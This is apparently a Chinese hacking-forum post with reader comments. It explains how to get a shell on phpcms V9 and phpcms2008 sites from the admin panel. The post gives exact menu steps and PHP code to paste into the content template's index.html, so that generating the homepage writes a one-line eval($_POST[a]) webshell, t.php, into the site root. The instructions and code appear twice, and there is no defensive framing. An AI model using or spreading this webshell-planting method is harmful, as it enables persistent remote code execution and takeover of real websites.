phpcms后台通杀拿shell
先是发到乌云了,结果是内容太简单 不给审核通过 罢了罢了 不发到那里了
利用办法是通过模板那里
界面==》模板风格==》当前使用的模板详情列表==》内容模型 content文件夹==》找到index.html点击修改
在最下面{template "content","footer"}的上一行写入
<?php
$fp = @fopen("t.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[a])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
点击提交,生成首页 会在根目录下生成t.php
phpcmsV9 phpcms2008测试成功
本来想要发到脚本安全检测版块的,结果木钱进不去 只能发到这里了 求加钱
利用办法是通过模板那里
界面==》模板风格==》当前使用的模板详情列表==》内容模型 content文件夹==》找到index.html点击修改
在最下面{template "content","footer"}的上一行写入
<?php
$fp = @fopen("t.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[a])'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
点击提交,生成首页 会在根目录下生成t.php
phpcmsV9 phpcms2008测试成功
本来想要发到脚本安全检测版块的,结果木钱进不去 只能发到这里了 求加钱
关于作者
评论46次
马克。 中前排支持。
这个就不清楚了,他是在生成index.html文件的时候 把里面的php代码给执行了 如果你会php可以去分析下
MARK//////....................
.html 怎么会解析触发生成代码
求个PHPCMS 前台的洞子呢。楼主。
其实贡献不在大小的,人的地位有高低之分,人不该有贵贱之别,技术也一样